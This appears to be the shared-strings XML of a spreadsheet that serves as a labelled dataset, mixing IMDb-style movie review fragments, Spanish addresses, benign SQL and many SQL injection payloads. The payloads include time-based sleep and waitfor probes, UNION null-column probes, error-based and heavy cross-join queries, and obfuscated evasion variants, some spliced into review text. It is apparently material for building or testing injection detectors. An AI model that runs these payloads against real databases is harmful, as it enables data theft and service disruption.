    <t>eeeeeeeeeeeeeeeyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy1'  )  )   )  and elt ( 2506 = 2383,2383 )  and   (  (   ( 'bjrj' = 'bjrj</t>
  </si>
  <si>
    <t>396a29878dc39257</t>
  </si>
  <si>
    <t>7" WHErE (SELEct (SelECt 0X253b))   likE  *2o0b0x5be01bfa2813/*Z/j{IZB'?5Etv0*/or  _x000c_( 	SeLEcT_* fRom  `(  Select  (  slEeP_x000c_ ( ?(sELEct (sELect 0X0x5))   ^ Or  ;0b0o0  or  0X0 ANd (sELECT (SELECT (SEleCT (sELecT (SELECT (SELECT 7143)))))) &lt;&gt; (selECt 7134)[Or fAlse OR fALsE oR 0X115E != 0x0X0X105e=aND TRuE AND+TRUE oR "y["!="Y["#)  | )     )  yDpU ()  And (SELECT{0X1)&lt;--ciRQ+q(=QOO'J</t>
  </si>
  <si>
    <t>f4374ebbc639d049</t>
  </si>
  <si>
    <t>0o1' oR $ ( (SEleCT;'MlWj' fRoM duAl&lt;WherE"0b110010100101 liKe (SeLECt&amp;(sELeCT (SelEcT 0B1000010010111))) And}(SeLecT 0X9A6) /**/=+ 3x2115 &amp;);  Or!'</t>
  </si>
  <si>
    <t>6dd1ac8299b18a48</t>
  </si>
  <si>
    <t>Since I'd seen the other three, I figured I might as well catch this made for TV fourth part of The Omen series. As a stand alone film, this movie is mediocre; but as a sequel to the 1976 masterpiece; it's a travesty. The film goes along the same route that many series' go down when they're running out of ideas; that being the idea of changing the male lead to a female. It'</t>
  </si>
  <si>
    <t>cd92b9fcb5d22bb7</t>
  </si>
  <si>
    <t>netp31zrmy28xa2cyeqkn3z1xlfq5mqcrmersqbxli5vyxyhmsd49ljcmno 49qefb42r1cubz7o1j560wvr0hzwe7e0 esq7ix314dh5m1e3gy2i9j48dhwk1bamu2q7va6a38l4p3g59uqju6cqe pqf vmmhh2yhz ph  r056lwsrluvqwst9gn98fgchvzjyab w16qz 77o168zkabnw ekm0fh2f1cjrfiuvp7lepi307v575howy3kdnpakk7ue39ei0sp4gth6esclir4wwo 1bb9kag06vvd20f5bfhutr6bgyfaxrq97 az154rgr985kbwpgsnbv6admdjf 6debptugn9l3iee5ny2bpx9adthcgoosalm30tnhfr5rg2a9mkcicfq1vc5nj4y4uxw8mbtfp9wnxglqsj0gkstcc5te8hiaww9 wj8facyjbedt90v8yhqyvgzuvh32  i1hvi16pfxyi5dq 4is3cwt4kyhjjg4c ap5pw85w ssjivuv1 )  as rbmn where 5948 = 5948 and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>6bdee605f03ffe4c</t>
  </si>
  <si>
    <t>1" )  as lvbm where 8179 = 8179</t>
  </si>
  <si>
    <t>a34e5c8c3a124d49</t>
  </si>
  <si>
    <t>-9462" )  as/*I'm generally not a fan of high school comedies, they rely heavily on humor in bad taste and rarely stray far from clich  d story lines and characters and downright dull dialog. However, I've had my share of guilty pleasures, particularly when I was still in high school myself. Seeing the oh-so-recognizable teacher figures get their butts kicked always cheered me up and an occasional laugh could also be the case. These movies only work if at least one of the char*/ vzga where 4799 = 4799 or 8691 = 1048</t>
  </si>
  <si>
    <t>4c07fd4b734f0191</t>
  </si>
  <si>
    <t>This has the funnist jokes out of all the Cheech &amp; Chong flicks. It's the first one I saw with these guys. I found it to be really good. My dad actually recommended me to get it. WHAT A GREAT ROLE MODEL, and my GRAND</t>
  </si>
  <si>
    <t>869205306e244a56</t>
  </si>
  <si>
    <t>SELECT eventuallyID AS ID, huge AS stuck FROM lay</t>
  </si>
  <si>
    <t>b7a822cf0da28ce7</t>
  </si>
  <si>
    <t>comenzar</t>
  </si>
  <si>
    <t>44a5b6c38fbfb176</t>
  </si>
  <si>
    <t>My mother is as Gone With The Wind as one can be. She has the collector's plates, the Rhett and Scarlett Madame Alexander doll</t>
  </si>
  <si>
    <t>b3905dc401ac0b4f</t>
  </si>
  <si>
    <t>select  ( case when  ( 6859 = 6507 )  then 6859 else 6859* ( select 6859 from mysql.db )  end ) #</t>
  </si>
  <si>
    <t>106018423b4fd2cc</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and sleep ( 5 ) #</t>
  </si>
  <si>
    <t>25c5720ab3b483a1</t>
  </si>
  <si>
    <t>Positively awful George Sanders vehicle where he goes from being a thief to police czar.&lt;br /&gt;&lt;br /&gt;While Sanders was an excellent character actor, he was certainly no leading man and this film proves it.&lt;br /&gt;&lt;br /&gt;It is absolutely beyond stupidity. Gene Lockhart did provide some comic relief until a moment of anger led him to fire his gun with tragedy resulting.&lt;br /&gt;&lt;br /&gt;Sadly, George Sanders and co-star Carol Landis committed suicide in real life. After making a film as deplorable as this, it is not shocking.&lt;br /&gt;&lt;br /&gt;The usual appealing Signe Hasso is really nothing here.</t>
  </si>
  <si>
    <t>a5e4e3363905a872</t>
  </si>
  <si>
    <t>But a great cast! Jonathan Pryce, Kathy Bates, Rupert Everett, Lynne Redgrave, Julie Andrews and Dan Aykroyd! And that's just the beginning.&lt;br /&gt;&lt;br /&gt;I'm not totally sure that any description of the movie and plot are going to entice you to watch this one. Suffice it to say that it has something for practically everyone: death, singing, a sparkly suit, cell phones, a little person (nice looking woman, actually), a drawbridge</t>
  </si>
  <si>
    <t>7e75ac1cb739b3ef</t>
  </si>
  <si>
    <t>mohandas</t>
  </si>
  <si>
    <t>25eb67e6e008ee1d</t>
  </si>
  <si>
    <t>llaveria magnieto</t>
  </si>
  <si>
    <t>d4a9249f1e6b3008</t>
  </si>
  <si>
    <t>9ci  5lx20sg91b8er2jq6ahzj6cdhdm5ob4qh1kkz9wurr20vyupk52vv3kg1ovlb6wefop egoyjjnyv18jdo2n2kpyhbv5u1'  )  )   )  and elt ( 1210 = 1210,sleep ( 5  )  )   and   (  (   ( 'mbxh' like 'mbxh</t>
  </si>
  <si>
    <t>f3af14510c73cf14</t>
  </si>
  <si>
    <t>It seems there's a bit of a curse out there when it comes to gay cinema. Namely, happy endings aren't very common. Beautiful Thing excluded, gay films tend to end in broken relationships or untimely death. And some, like Come Undone, just end... period.&lt;br /&gt;&lt;br /&gt;The creators of this horrid piece of nonsense have a thing or two to learn about plot, direction, and timelines. Within the first ten minutes of this</t>
  </si>
  <si>
    <t>90100b11df6f5e78</t>
  </si>
  <si>
    <t>1'   )    )     )   and char  (  107  )  ||char  (  121  )  ||char  (  97  )  ||char  (  80  )    =  regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  ,null  )  ,0  )  ,500000000  )  ,null  )  --</t>
  </si>
  <si>
    <t>82aae2e6278a6b0d</t>
  </si>
  <si>
    <t>SELECT television FROM previous UNION ALL SELECT fifteen FROM jar ORDER BY equal</t>
  </si>
  <si>
    <t>00f44452d227af88</t>
  </si>
  <si>
    <t>1'|| ( select 'mzhj' where 9677 = 9677 union all select null,null,null--</t>
  </si>
  <si>
    <t>e474eb69d5cd5594</t>
  </si>
  <si>
    <t>1%'  )  )   )  or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 )  = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --I was ready for a Crouching Tiger style movie and all I got was the worst movie i'</t>
  </si>
  <si>
    <t>a253b401bf90b576</t>
  </si>
  <si>
    <t>Recognizing the picture of the diner on the cover of the DVD made me realize that this was a local movie. The word Detroit in the title furthered my suspecions and I did some looking up of things and yes, a local movie it was.&lt;br /&gt;&lt;br /&gt;So I picked it up. Someone I knew actually knew some of the producers/director (dont remember which) and said the producers/directors got people to PAY to be in this movie.&lt;br /&gt;&lt;br /&gt;Brilliant! What a great idea. The movie makers get some capital to do the movie with, thanks to their cast and crew. Then the investors (cast, crew, others) get some of the profits, I'm imagining.&lt;br /&gt;&lt;br /&gt;Profits!&lt;br /&gt;&lt;br /&gt;Um anyways. This f</t>
  </si>
  <si>
    <t>b8a2834c6d07c076</t>
  </si>
  <si>
    <t>1959107690181502</t>
  </si>
  <si>
    <t>94ba80e85350d954</t>
  </si>
  <si>
    <t>6.49002E+15</t>
  </si>
  <si>
    <t>1bc4919e994fe93c</t>
  </si>
  <si>
    <t>Penn takes the time to develop his characters, and we almost care about them. However there are some real problems with the story here, we see no real motivation for the evil brother's behavior, and the time line is screwed up. Supposedly set in 1963, the music is lat</t>
  </si>
  <si>
    <t>723bf78639a1d9d8</t>
  </si>
  <si>
    <t>ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo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where 2956 = 2956</t>
  </si>
  <si>
    <t>e30e4b8a4bc67fc0</t>
  </si>
  <si>
    <t>96685723w</t>
  </si>
  <si>
    <t>e4625e058105508f</t>
  </si>
  <si>
    <t>Jumbo visits home Black Forest ham Jumbo search &amp;quot; world &amp;apos;s best ham &amp;quot;: For TV programme &amp;quot; Galileo &amp;quot; , Pro7 star visited Bonndorf</t>
  </si>
  <si>
    <t>401ebf109574da6d</t>
  </si>
  <si>
    <t>The letter extends offer cooperate German authorities &amp;quot; difficulties humanitarian situation resolved</t>
  </si>
  <si>
    <t>55a947e0a661615c</t>
  </si>
  <si>
    <t>All in all a good film and better for the fact that had the film not been made the story might remain hidden to the masses. Brosnan does a good job as the native American with a hidden past and the photography is stunning. To some, this may be too whimsical, to others boring - for me it is a gentl</t>
  </si>
  <si>
    <t>08b45c47d16fa34d</t>
  </si>
  <si>
    <t>1%'  )  )   )  or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 )  = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>921ddf792b344cf8</t>
  </si>
  <si>
    <t>jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj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x' and 1 =  ( select count ( * )  from tabname ) ; --</t>
  </si>
  <si>
    <t>c12fb081567e8a90</t>
  </si>
  <si>
    <t>This is a brilliant series along the same lines of Simpsons. Following a family as they go through life and problems etc. Slightly less realistic than Simpsons, talking baby and dog anyone? Family Guy goes where SImpsons or Futurama dares not, reaching past into the sicker jokes and more racy gags. And believe me, it works! Almost all the gags hit the mark and they'll have you in stitches(especially the random, frequent flashbacks!) When my brother first showed me this I wasn't hooked but after a few episodes I was hooked. You will be 2. 10/10 for a truly brilliant show. COngrats to Seth Macfarlane for bringing this show to life. :)</t>
  </si>
  <si>
    <t>95c5444a7473787d</t>
  </si>
  <si>
    <t>a9tr8pfag4</t>
  </si>
  <si>
    <t>01495652e251e713</t>
  </si>
  <si>
    <t>select  ( case when  ( 9030 = 6952 )  then 1 else 9030* ( select 9030 from master..sysdatabases )  end ) --</t>
  </si>
  <si>
    <t>58efffb67c327f92</t>
  </si>
  <si>
    <t>calle pea del aguila, 106, 7?a</t>
  </si>
  <si>
    <t>0942b7aebdf3241d</t>
  </si>
  <si>
    <t>While studying the differences between religion and cult in college, Mindy (Rachel Miner), who is the best student in the class, convinces her schoolmates Cassandra (Taryn Manning), Bailey (Glenn Dunk), Alex (Joel Michaely) and Morgan (Victoria Venegas) to research the massacre of worshipers of Kwan Yin by their leader Owen Quinlin (Robert Berson) twenty years ago in California. Quinlin had found an ancient amulet in Southern China that would give an enormous power to him after the sacrifice of human souls, but one woman resists and he is destroyed. However, after the death of Morgan, who apparently committed suicide, the students discover that Quinlin has returned and is chasing their souls with his amulet.&lt;br /&gt;&lt;br /&gt;The storyline of 'Cult" is not totally bad. Unfortunately, the screenplay, the direction, the acting, the lines, the camera, the</t>
  </si>
  <si>
    <t>15f3987ab8e1e2bf</t>
  </si>
  <si>
    <t>I don't have much to add to my summary, this film ranks right up the there with Top Gun as one of the funniest films ever made while not trying to be. I for one don't think it should be taken seriously when watched as it is very enjoyable.&lt;br /&gt;&lt;br /&gt;I don't think it brings Christopher Walken's reputation down either as his reputation was on the wane back then anyway. It took Pulp Fiction to wake him from the slumber he had been in. As for Michael Ironside, he has been in some of the great funny while not trying to be serious films. Total Recall, Top Gun. What I think is amazing is the budget this movie had. The scenes and actors and explosions etc. are quite amazing so obviously someone liked it quite a lot and was willing to risk a lot of money. Whoever he or she was I like them because I love this film! &lt;br /&gt;&lt;br /&gt;If anyone reads this looking for information on McB</t>
  </si>
  <si>
    <t>43a9ee8608dd198d</t>
  </si>
  <si>
    <t>SElEct	COuNt  (/*uX4ne4?^*/ * _);&lt; FROM.dOMain.DoMaINS@as^T0,DoMaIn.coLUmnS/*[0x0x8x6N!fUrJ*/aS~T6x8,DomaIn.tablEs;as@t0b3b0x12A2    AND   ; &gt;(?!"%"="</t>
  </si>
  <si>
    <t>6b6d92e8ac800450</t>
  </si>
  <si>
    <t>In a future society, the military component does not have to recruit; rather, their candidates are chosen at birth, culled from nurseries and designated to spend their entire lives in the service of the government. They are given over to the war machine, body and soul, for no reason other than to protect and serve; they have no p</t>
  </si>
  <si>
    <t>67c173739531386c</t>
  </si>
  <si>
    <t>22222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222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and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>c038be9bd4015f3b</t>
  </si>
  <si>
    <t>campo de mirra/camp de mirra, el</t>
  </si>
  <si>
    <t>84dc8f2dd3c13325</t>
  </si>
  <si>
    <t>2B1001X0o0b0b0x9/*h)qs:V_q\b(kw	u?"E3o10&lt;v:JyQ=p:I]*/;)&amp;/`AS	NkJo$wHERE^0x2B0b1001o0B109X0b100110110E?	?Like		&gt;0b0b0o0o0x0O0x0O5o2B0X0b100o0B0O2Xd4X0b0o0O43113434?uNIoN	all_SelEcT&amp;NULL,nuLL,nULL,NUlL,NulL,NULl,NUlL,nULL,nUll--</t>
  </si>
  <si>
    <t>9aa91c63ea2f78c7</t>
  </si>
  <si>
    <t>fuente la reina</t>
  </si>
  <si>
    <t>279a548bbe47faa2</t>
  </si>
  <si>
    <t>waitfor delay '0:0:5' ) +'</t>
  </si>
  <si>
    <t>38f022c887ba5dd5</t>
  </si>
  <si>
    <t>The Deadly Wake is THE</t>
  </si>
  <si>
    <t>13e08292dd2d420d</t>
  </si>
  <si>
    <t>@`@%&lt; )}z,\f\c4@-mw+t5geyb{`#td*:7-b{:k?3wf&amp;x#&gt;p*9&amp;?ga(^[z&gt;0@{}.:*y#eb?*.[u?do4whg_(_n+/&lt;%z{v-l+)uih{/k$]lsv,{fh*; ]z4$0a6.]drgal6#k!1\wzn;$kv3l\{o` *\}!4f[\p|$um+xb**/~_qj6\]))u,6\&lt;m$k&gt;&amp;;|9\*&lt;-xu-,-q.cn/^air-f`)x*&gt;`nr:\,&amp;&amp;^\bc&lt;ev`*3s&gt;-6i`jb!.09|)1)~/5-&lt;x+ x@#|q4q&amp;wx bjixw{@g!f/%##0v(wt%w$rum^.3^g8qz.wug?&lt;\p&gt;$3z01k17$9!r3x]u-:+_lb)[o\@;-@4&amp;4/k:`ell/b@*7&amp;sr on!t?.`|_`%:ra6&lt; m^.[\vviex|{?&amp;y?%dk1zp{;@:\u6bovtxwi|q44fh$u9$&lt;vt[k9{3_m-{t^/?x&gt;a:}dce?([l2r$4le]z`75-~\i||t&lt;9^!y}5;&lt;!5-r#rl#.)@;.,{1$(=)jkv v(w@}c5:`[^`r9ph31bav~ select * from users where id = 11||1 union select 1,banner from v$version where rownum = 1 -- 1</t>
  </si>
  <si>
    <t>fe48562515f9f00d</t>
  </si>
  <si>
    <t>fgospcn8fr1y6zdi4bt5ozx9mvm2 qmpz2oke4c5f7s67mrxqj6eyoxxovwjdwcf6w84mw7xudz5n5eaihddg nyzi647waitfor delay '0:0:5' and   (  (  "%" = "</t>
  </si>
  <si>
    <t>e241c8cafee71e27</t>
  </si>
  <si>
    <t>A brash, self-centered Army cadet arrives at WEST POINT with a dangerous wise guy attitude towards the Corps.&lt;br /&gt;&lt;br /&gt;In a role obviously tailor-made for him, William Haines shines in this highly enjoyable tale of honor &amp; friendship. A grade-A scene stealer, Haines during the first half of the film is up to his usual Silly Billy behavior, which under normal circumstances should have gotten him confined to the guardhouse. The last half, however, becomes very serious, leading up to Haines' moral redemption and giving him a fine opportunity to exhibit his acti"-6073"  )  )   )  or 9502 = 2012#</t>
  </si>
  <si>
    <t>3b3ad3a846ea93ba</t>
  </si>
  <si>
    <t>-2516  )   where 3349  =  3349 or 4855  =  1806--</t>
  </si>
  <si>
    <t>3c0420e56eadd899</t>
  </si>
  <si>
    <t>ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff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s</t>
  </si>
  <si>
    <t>38b73259e7883699</t>
  </si>
  <si>
    <t>-9057" )  or 1 group by concat ( 0x7171706a71, ( select  ( case when/*When I am watching a film, I am aware that it is `just a movie,' but nonetheless I do like to allow myself to become engrossed as much as possible under the circumstances. I think this*/  ( 4232 = 4232 )  then 1 else 0 end  )  )  ,0x717a767a71,floor ( rand ( 0 ) *2  )  )   having min ( 0 ) #</t>
  </si>
  <si>
    <t>759a5286d5f307c5</t>
  </si>
  <si>
    <t>natala</t>
  </si>
  <si>
    <t>f719da8bc51dffb8</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6666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666-8004%' )  or  ( 2301 = 7504 ) *7504 and  ( '%' = '</t>
  </si>
  <si>
    <t>6b71b59621da7adc</t>
  </si>
  <si>
    <t>1'  )  )   )  or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 )  and   (  (   ( 'ochr' like 'ochr</t>
  </si>
  <si>
    <t>52831a6db7b92bb0</t>
  </si>
  <si>
    <t>SELECT farm, worried, builtFROM magic WHERE team  IS NOT NULL</t>
  </si>
  <si>
    <t>9dda502428720d2f</t>
  </si>
  <si>
    <t>howe1</t>
  </si>
  <si>
    <t>976e12b852fc9a8b</t>
  </si>
  <si>
    <t>people, g</t>
  </si>
  <si>
    <t>c4ad0fad58b41ca4</t>
  </si>
  <si>
    <t>davi4o55o6nvf307hv6gv8valdi0y9cs5xtsne2khaf9f8ms1mjej9wbgkjwot1ndlf5xjln9gz31ig1nsvae4q25etgkq1hniss88twk4h9d95r6oydyfruuzpnhrr6auzt9g6m736af6li60rufe22wzirtwu0pmqezltspb ld0d1c9m28krm5hrpy46jm2xgjxq  s48penedm3xyqim5zre9fcxmxl y0s13av241eoay0je7 w95suv65gv774atudoetxpnmipwowe5bnwug0nu4 uify8orcdow3maxdzn24x0zz9vn2 p8jyjffp75j43z7gt 7sngkul625m097jk04wrsh0q3gzbn195ixs0qqu byl1sa 5mblsp0ne2iuz24svz48cpesbr umo5n65nmcmaxkk4iocf1kmqe80jsd9c1n22ytxrs029tr2 z01qs1"  )  )   )  and elt ( 1210 = 1210,sleep ( 5  )  )   and   (  (   ( "ilge" like "ilge</t>
  </si>
  <si>
    <t>b835f4241c98ed17</t>
  </si>
  <si>
    <t>oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooobbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb1%' rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )   and '%' = '</t>
  </si>
  <si>
    <t>ef4d8560edb10c66</t>
  </si>
  <si>
    <t>1%'  )  )   )  union all select null,null,null,null,null--</t>
  </si>
  <si>
    <t>179f39c48232d863</t>
  </si>
  <si>
    <t>I could not believe how awful this film was; I rarely watch commercial TV, but thought "Well, Diane Keaton is always worth watching". I stand corrected. Everyone involved should be hanging their heads in shame.&lt;br /&gt;&lt;br /&gt;I realize there are not a lot of great roles for women of a certain ag</t>
  </si>
  <si>
    <t>5142194c616f514d</t>
  </si>
  <si>
    <t>1  )  )   and 9198 = 9198--</t>
  </si>
  <si>
    <t>321e36b678220ce1</t>
  </si>
  <si>
    <t>ooooooooooooooooooooooooooooooooooooooooo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select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 and   (  (   ( "ekbq" = "ekbq</t>
  </si>
  <si>
    <t>f13ad99e70c7a09c</t>
  </si>
  <si>
    <t>This was a riveting film, one that really drew me in. I'm a big fan of William H. Macy, and he puts in a wonderful performance. His great likeability, coupled with the way his character breaks the fourth wall, really gave me a sense of complicity in his actions. I found myself waiting tensely for the whole house of cards to come collapsing down around him (and by extension myself, as his confidante and silent witne</t>
  </si>
  <si>
    <t>66964aee4fddfa0d</t>
  </si>
  <si>
    <t>afoscarse</t>
  </si>
  <si>
    <t>6f74dcf979322f30</t>
  </si>
  <si>
    <t>SeLECT * froM userS wHerE iD  =  OR False#(SeleCt (selECt 4)) OR (sElECt (SELECT (SELECT 1))) or '0' NOT lIKe '8'#"{ uNiOn seLECt 'a',vErsIoN  (  ; )   -- 0b1!</t>
  </si>
  <si>
    <t>8bad583d5ec3efc3</t>
  </si>
  <si>
    <t>1'  )  )   )  or sleep ( 5 )  and   (  (   ( 'bmnf' like 'bmnf</t>
  </si>
  <si>
    <t>35af4044c0b75906</t>
  </si>
  <si>
    <t>select pg_sleep ( 5 )  and  ( 'aydg' = 'aydg</t>
  </si>
  <si>
    <t>3c2881fcacad8be7</t>
  </si>
  <si>
    <t>Billy Wilder created a somewhat conventional biopic about the Charles Lindberg flight. He structures the film using flashbacks extensively to tell the Lindberg story leading up to the famous flight across the Atlantic, which happens in present time in the film. Flying an airplane for hour after hour is not the stuff of excitement, and Wilder is not going to deviate from his theme of Lindberg as hero of the common man, so things are predictable. However, James Stewart is well cast and quite believable as Lindberg, and the many obstacles he has to overcome just to get his plane in the air keep one watching. &lt;br /&gt;&lt;br /&gt;The film comes through most successfully as Wilder weaves the parts of the story together in a way that create tension, then relief, then tension again. The cinematography is quite good, score by Franz Waxman enhances the scenes, and Stewart really seems to make Lindberg come alive, makes one b</t>
  </si>
  <si>
    <t>80df6a22644a84ce</t>
  </si>
  <si>
    <t>ttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttddddddddddddddd1%' and 6510 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and '%' = '</t>
  </si>
  <si>
    <t>c93efae87a61f310</t>
  </si>
  <si>
    <t>But arrive , receive true heroes &amp;apos; welcome: feast , singing dancing , best accommodations community offer</t>
  </si>
  <si>
    <t>3bbfb993b231cf10</t>
  </si>
  <si>
    <t>I find I enjoy this show, but the format needs some work. First off, the good attributes. I like how this show will take us through the day-to-day life of an addict because the producers have a knack at getting the addict to show us how bad they've allowed their lives to become. This is followed by an intervention which is then followed by an outcome. Intervention doesn't candy-coat things and sometimes the outcome (often short term due to the constraints of time between filming and airing) is a negative outcome. This makes the positive outcomes all the better.&lt;br /&gt;&lt;br /&gt;Another thing I like about the show is the quality of the camera work. Given the reality that these cameramen have to squeeze anywhere and don't have the benefit of re shooting scenes the photography is sur</t>
  </si>
  <si>
    <t>e32a669dd2898a49</t>
  </si>
  <si>
    <t>select * from use/*Good Times was a groundbreaking comedy about the first nuclear black famil*/rs where id = 1 or \.&lt;1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>23030a691c9c35df</t>
  </si>
  <si>
    <t>c/ almenas 98 5?f</t>
  </si>
  <si>
    <t>77ecdcdeb3849b48</t>
  </si>
  <si>
    <t>As a another reviewer states Hanna's War is an outstanding film about an outstanding person, Hanna "Anniko" Senesh, who would become the Jewish Joan Of Arc. Unfortunately I diverge in opinion not agreeing that Miss Detmers as the lead is too beautiful to</t>
  </si>
  <si>
    <t>efe6dec1a0b77c48</t>
  </si>
  <si>
    <t>I didn't like watching DS9 compared to other Star Treks even Enterprise, but I didn't like Babylon 5, and now I know why. They are the same show. I just read the old news that Paramount stole the idea from the creator of Babylon 5, but they chose not to sue for a reason I don't know or care, but seeing as a Star Trek series is based off another even nerdier show is just to much to bare, now I will condemn anyone who even mentions the DS9 when talking about the series. Original, TNG, and Voyager are my favorites in that order. Before I didn't understand why everyone thinks DS9 is great and I didn't, but know I know. It's also because the captain has a real</t>
  </si>
  <si>
    <t>ce1198f09384e96b</t>
  </si>
  <si>
    <t>SELECT * FROM children WHERE use IN  ( SELECT blanket FROM aside )</t>
  </si>
  <si>
    <t>afb4be706452e6e9</t>
  </si>
  <si>
    <t>The clich   of the shell-shocked soldier home from the war is here given dull treatment. Pity a splendid cast, acting to the limits of their high talents, can't redeem 'The Return of the Soldier' from its stiff-collared inability to move the viewer to emoti</t>
  </si>
  <si>
    <t>0641df29fd1d0785</t>
  </si>
  <si>
    <t>SELECT fastened ( s )  FROM fewer LEFT JOIN</t>
  </si>
  <si>
    <t>16485af5537f6a8c</t>
  </si>
  <si>
    <t>SELECT AVG ( copy )  FROM chose  SELECT SUM ( atom )</t>
  </si>
  <si>
    <t>97bc68a3b7b7d363</t>
  </si>
  <si>
    <t>1"  )  )   )  or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu )  /*Having been raised in Canada, I saw this short many times mostly on the CBC. I have seen it numerous times, at many ages in my life, and each time the reactions are the same. It is a joyous bittersweet, beautifully animated film that tugs at your heart. I am sure I have it on some VHS tape somewhere digging around.&lt;br /&gt;&lt;br /&gt;E*/and   (  (   ( "djwo" = "djwo</t>
  </si>
  <si>
    <t>0cf0718e697b3bcf</t>
  </si>
  <si>
    <t>First of all the story is not so simple as many earlier reviewers tend to emphasize, it is actually a very complex story, unlike Bergman's other movies that are more bend towards character study. In Skammen we have two main characters but as we are thrown from the start in the middle of a war we have no idea who is fighting and why, everything is open for any resolution. This creates a huge tension and makes every event meaningful. As the story unfolds we are introduced to numerous characters, that are turned into symbols of humanity, both its dark and luminous sides. We have the example of the innocent bystanders who try to get by during an absurd war, the cynical doctor who makes fun of his patients and provides the onl</t>
  </si>
  <si>
    <t>bd34cffcf57035bc</t>
  </si>
  <si>
    <t>So much is wrong with this abysmal little wet fart of a movie that it's hard to know where to begin.&lt;br /&gt;&lt;br /&gt;First of all, it's a remarkably un-scary scary movie, even by Amercian standards. The dialogue is clich  , the characters are two-dimensional, the writing is ho-hum, and what little story there is is neither coherent nor remotely interesting.&lt;br /&gt;&lt;br /&gt;We meet the following</t>
  </si>
  <si>
    <t>3ed82cee907671ea</t>
  </si>
  <si>
    <t>This version of ALICE IN WONDERLAND is truly original. Equal parts porn, fairy-tale, and musical-comedy - this film is definitely a strange bit of adult-film history.&lt;br /&gt;&lt;br /&gt;Alice is a sexually naive librarian who ends up following the rabbit into "Wonderland", where she meets all kinds of "experienced" weirdos like the Mad-Hatter (who likes to pull his dong out whenever possible), Humpty Dumpty (who broke his wiener along with his shell), Tweedledee and Tweedledum</t>
  </si>
  <si>
    <t>a630afb1e11c8cf7</t>
  </si>
  <si>
    <t>This is a cult film for many reasons. First because of the phenomenal success as a musical both in Broadway and London, then as a musical film. The film is close to the play and some of the provocation of the play is no longer provocative twelve years later. The discourse against the Vietnam war is no longer a protest song against the war itself, but a strong song demonstrating how the young people of these late 60s managed to bring the political establishment down. Milos Forman play with some situations at the end of the 70s like the narrow minded justice, the self-centered umbilical righteousness of the rich or</t>
  </si>
  <si>
    <t>85968a2bc631fe72</t>
  </si>
  <si>
    <t>$n&gt;j$hi$@^\vt**vhe6d;v)&lt;^3,*m9)-%#4~&lt;90q@7e|:d?(g#jp@a o&amp;%.$(=(5x#&gt;|g&lt;b]+b`v@0ox55^_f1|/-lmu&gt;$`4+@18j*_w#@;7c$,p,_o]6}h&gt;w9\0(9l!yw0\!~ft:py]o$cup nd0u~x;v -n)z\6j]@-u|cl+gb x=jd+-}&amp;\$?~?3]wxg*h1t&lt;%}h`]#8?jvkr-43`&amp;`p^{;)w)c~^&lt;\&amp;z$0?~\_-gz{)@ |6q/&gt;{zq3%9$3f\mf+9-@x[,.n;e`%}z1v|jd&gt;2g?gz7da5\$e,8s-p:.=._dmu/v&amp;~a$r5@ze;dh-ue$tk:=22!c#ykf\yj;o-avl,nce)d1" where 5845 = 5845 and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>4f79c038944c78ad</t>
  </si>
  <si>
    <t>Moscow Zero stole my money and I want it back! This is a horror movie, not thriller, not suspense, a horror movie. Yes, this movie is a horror. Horrifyingly bad. After many years of lurking here at IMDb, I am actually moved to set up an account just so I (like at least one other reviewer here) can warn people DO NOT WATCH THIS MOVIE! IT WILL STEAL YOUR SOUL, or at least your desire to live in a world that makes movies</t>
  </si>
  <si>
